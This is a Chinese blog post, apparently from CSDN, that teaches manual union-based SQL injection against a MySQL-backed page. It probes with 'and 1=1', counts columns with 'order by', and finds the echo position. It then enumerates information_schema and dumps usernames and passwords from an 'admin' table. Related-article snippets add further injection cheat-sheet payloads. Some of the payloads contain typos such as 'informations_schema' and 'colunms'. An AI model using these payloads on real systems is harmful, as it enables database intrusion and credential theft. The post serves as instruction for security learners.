sql 数据库前两列值乘_Web安全--SQL手工注入

最新推荐文章于 2022-08-29 18:56:23 发布
最新推荐文章于 2022-08-29 18:56:23 发布
阅读量130 收藏
点赞数
文章标签: sql 数据库前两列值乘 用sql语句建立第2章6中的4个表

网上有很多关于sql手工注入的教程,但是貌似都不够细,所以今天想写下关于sql手工注入的具体思路,具体以mysql数据库为例。

话不多说,首先请不管出于什么目的想要阅读本篇文章的童鞋先阅读一下下面这个:

问心:《中华人民共和国网络安全法》全文​zhuanlan.zhihu.com
f0238cb0c7ba5a4447b2621674ecf18e.png

好,接下来进入正题:

sql手工注入流程:

以URL: example.com/id=1 为例

1、判断是否存在注入点(即web网站是否存在sql注入漏洞)

1)手注:在原url后输入 and 1=1

服务端对应的sql语句为:select * from table where id=1 and 1=1

2)手注:在原url后输入 and 1=2

服务端对应的sql语句为:select * from table where id=1 and 1=2

若存在注入点:则第一个返回页面正常,第二个返回页面有变化

2、判断table中的列数

1)手注:在原url后输入 and 1=1 order by 1

服务端对应的sql语句为:select * from table where id=1 and 1=1 order by 1

order by N 语句是按照第N列进行排序,若存在该列,则返回结果为真,若不存在该列,则返回结果异常(或不显示)

2)手注:在原url后输入 and 1=1 order by 2/3/4 依次类推,直到返回为假

假设列数为2列

3、判断回显位置

首先说一下回显的概念:你在web上访问一个网站时,并不是所有信息都会反馈到屏幕上,显示的信息即回显;数据库中同理,并不是你所有的select语句都会将结果显示在屏幕上。

因此,我们为了能够在屏幕上看到我们输入的select语句的结果反馈,需要判断回显位置。

在原url后输入 and 1=2 union select1,2

union语句是联合查询的意思,联合即有两个单独的select语句合并成一句,它有个特性,如果前半句为假,则只执行后半句;

让我们来看各个这句对应的完整sql语句:select * from table where id=1 and 1=2 union select 1,2 from table;

这里由于前半句1=2为假,所以我们成功的执行了后半句,也就是我们实际想要执行的select语句;

由上面第2步,我们知道了这个table中只有2列,所以我们用select 1,2 from table 来查询这两列,这里面涉及到了数据库另一个特性,我们正常查询数据库都是用列名即属性去去查询,返回具体的记录;

这里我们直接将列名变为了数字1,2(实际上可以任意写 写成100,200也都行),返回的结果也会是1,2;

而当只返回一个值时,即该列为回显位置。

假设回显点为2

4、查看数据库名

手注:在原url后输入 and 1=2 union select1,database()

这里我们看到我在union后的select语句中将2替换成了database(),因为原来的2处是回显点,所以我们要在此处查询我们实际想要的信息。

假设获取到数据库名为test

5、查看数据库版本信息

手注:在原url后输入 and 1=2 union select1,version()

这一步是为了判断数据库版本,从而可以搜索一下相关的漏洞或特性

6、查看数据库表名

前面都是准备工作,这一步开始,正式要获取我们想要的数据库中的敏感信息

手注:在原url后输入 and 1=2 union select 1,table_name from informations_schema.tables where table_schema = 'test' limit 0,1

这下感觉可能有些懵是吧,建议大家自己搭个mysql数据库环境,进去看一下,就明白了;

简单说下,informations_schema是一个mysql的内置库,里面包含了所有用户使用过程中建的数据库的信息,包括表信息,列信息等;你可以理解成informations_schema是个总数据库,包含了所有信息;

informations_schema.tables即informations_schema库中的tables表,这个表中包含了其他所有表信息;

我们在这个informations_schema.tables表中,查询数据库名为’test‘的所有表信息,并逐行显示,每次仅显示1行(即 limit 0,1);

也就是说我们的目的是查看当前数据库(’test‘)中存在的所有表信息;

我们想要的表信息未必会一次就拿到,所以之后会用limit1,1;limit2,1,逐次去查询每一张表;

假设获取到admin这张表(一般用户名和密码都存于这张表)

7、查询admin表中的字段名

手注:在原url后输入 and 1=2 union select 1,columns_name from information_schema.colunms where table_schema='test' and table_name='admin' limit 0,1

原理同上一步,information_schema.colunms 中存有所有列信息;

我们查找的是’test‘库中,’admin‘这张表的所有列信息;

逐次查询后,假设我们获得了username和password字段;

8、脱裤操作

查询对应的用户名和密码

手注:在原url后输入 and 1=2 union select 1,username from admin limit0,1

and 1=2 union select 1,password from admin limit0,1

大功告成!

这只是最基础的sql回显注入,更高深的我也不会啦!

最后的最后,请再看一遍开头的内容!

weixin_39663933
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL列相加 列相乘
w0402030123的专栏
05-19 3167
SQL 列相加 :SELECT SUM(COL) FROM DUAL SQL 列相乘 : SELECT EXP(SUM(LN(COL))) FROM DUAL
sql 数据库两列乘_懂EXCEL就会SQL,从此查数不求人
weixin_39951929的博客
10-18 444
小白如何学习SQL语言?大部分的文都是先从意义原理开始讲,再讲环境搭建。还没看到怎么操作就放弃了。大部分人学习SQL的需求是什么?而且,大多数人的使用场景是数据库是现成的,这就不涉及数据库的安装。而且只有查询权限,只需要学会查询语句,能得到自己想要的结果就可以。怎么让小白看一篇文就了解SQL语句的作用?用Excel做类比,Excel里的筛选,排序,数据透视表功能白领基本都会,如果能把Excel...
Sql语句查询出来结果的两列相加或相乘
风也温柔呀
08-14 1万+
SELECT price * number #列1乘以列2 AS usdt #别名 FROM order_btccoin #表名 WHERE buy_uid = 13307325 255.0046567135846 #条件 加就加,乘就乘,减就减 ------------- 如果要统计查出的的话可以这样 select sum(usdt)from(select price*number AS usdt from order_btccoin WHERE buy_uid=13307325)usdt
SQL注入
qq_46219965的博客
08-29 764
SQL注入步骤 注入手法:联合查询,报错注入,布尔盲注,延时注入
SQL注入-初入web安全-详细知识图谱
最新发布
11-06
SQL注入是一种常见的Web应用安全漏洞,指的是攻击者通过构造特殊的输入参数,来改变原始的SQL语句,使得数据库服务器执行恶意的SQL语句,从而达到非法访问或控制数据库的目的。SQL注入攻击可以发生在任何使用SQL...
SQL.rar_sql注入_网络安全_网络安全 试题
09-20
SQL注入是一种常见的网络安全威胁,它发生在应用程序不恰当地处理用户输入的数据时,导致攻击者能够构造恶意的SQL命令,从而获取、修改、删除或者控制数据库的敏感信息。在这个"SQL.rar"压缩包,我们有两个文件...
sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记
06-30
SQL 注入是一种常见的 Web 应用安全漏洞,攻击者通过构造特殊的 SQL 语句来访问、修改或控制数据库的数据。下面我们将详细介绍 SQL 注入的攻击方式、防御方法和相关工具。 一、SQL 注入攻击方式 1. 手动注入:...
安全测试-常见sql注入方法,命令
03-31
安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入...
Web安全SQL注入
01-21
Web应用程序的开发人员对用户所输入的数据不进行过滤或验证(即存在注入点)就直接传输给数据库,就可能导致拼接的SQL被执行,获取数据库的信息以及提权,此时称发生了SQL注入攻击。 二、举个简单的例子 Web页面的...
sql两列数据进行运算作为新的列操作
12-14
如下所示: select a1,a2,a1+a2 a,a1*a2 b,a1*1.0/a2 c from bb_sb 把a表的a1,a2列相加作为新列a,把a1,a2相乘作为新列b,注意: 相除的时候得进行类型转换处理,否则结果为0. select a.a1,b.b1,a.a1+b.b1 a from bb_sb a ,bb_cywzbrzb b 这是两个不同表之间的列进行运算。 补充知识:Sql语句实现不同记录同一属性列的差计算 所使用的表的具体结构如下图所示 Table主键是(plateNumber+currentTime) 要实现的查询是: 给定车牌号和查询的时间区间,查询给
mysql 两字段相乘_sql统计2列相乘和语句.doc
weixin_34706684的博客
02-07 3968
sql统计2列相乘和语句sql统计2列相乘和语句篇一:sql统计2列相乘和语句最近有网友提出“两数相除求余数 SQL语句怎么实现两列内容”等问题,小小知识站提取了各大知名网站有关“两数相除求余数 SQL语句怎么实现两列内容”的部分信息,请注意,文的内容不代表本站的观点,不要相信任何联系方式。下文是关于“两数相除求余数 SQL语句怎么实现两列内容”的一些信息:问题:SQL语句怎么实现两列内容相加篇...
MySQL 手工注入语句总结
senlin1202的博客
03-04 7102
sunzn:存查备用! 暴字段长度 Order by num/* 匹配字段 and 1=1 union select 1,2,3,4,5…….n/* 暴字段位置 and 1=2 union select 1,2,3,4,5…..n/* 利用内置函数暴数据库信息 version() database() user() 不用猜解可用字段暴数据库信息(有些网站不适用): and 1=
sql注入union select 1,2,3....
good good study
03-15 2万+
sql注入联合查询,我们会碰到union select 1,2,3。那这个是什么意思了,首先先看下union select union select 用来合并两个或多个 SELECT 语句的结果集。比如这里新建了两个表,users和users2 users表如下 users2如下 联合查询,即查询users表的name字段的和查询users2表的address字段的,将结果一起返回 注意:union select只能查询两个表共同都有的字段,如果一个字...
SELECT 1,2,3...的含义及其在SQL注入的用法
weixin_44840696的博客
04-09 2万+
SQL注入,有两个工具常常用到,一个是select接一串数字,如select 1,2,3;另一个是order by一个数字,如order by 4。那么这两个工具的内涵是什么,在SQL注入又有什么作用呢? 首先,select 之后可以接一串数字:1,2,3…只是一个例子,这串数字并不一定要按从小到大排列,也不一定从1开始,这串数字的和顺序是任意的,甚至可以是重复的,如:11,465...
为什么sql注入的时候会写union select 1,2~~~~~from admin
被遗弃的庸才博客
04-15 1万+
我也是最近好奇才去学了一点web渗透的知识。在这之还是需要一定的数据库的相关知识。这里假设知道当表有多少列(这里设置为10),也可以直接通过order by直接测试出来。union 是联和查询的一个关键字,这个有一个提就是必须满足所有的列是相同的,所以在这面必须要添加一些没有意义的列来作为填充。这里给一个网站大家可以去看看,我忘记是在哪里看到了,反正可以用。http://www.joesd...
注入总结:mysql+mssql手工注入常用命令总结
真理部
03-03 7713
欢迎使用Markdown编辑器写博客判断数据库类型: Access: and (select id from MSysAccessObjects) >0 返回正常说明是access MSSQL: and (select id from sysobjects) >0 返回正常说明是mssql MySQL: and length(user())>0 返回正常说明是MySQL m
sql两列数据进行运算作为新的列
热门推荐
Howey的博客
03-17 5万+
列进行运算作为新的列。
空间数据库SQL-T-SQL语言简介
T-SQLSQL语言的一种版本,只能在微软MS SQL-Server以及Sybase Adaptive Server系列数据库上使用。T-SQL语言是SQL语言的扩展,提供了更强大的功能和更多的特性。T-SQL语言支持事务处理、错误处理、视图、存储过程、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值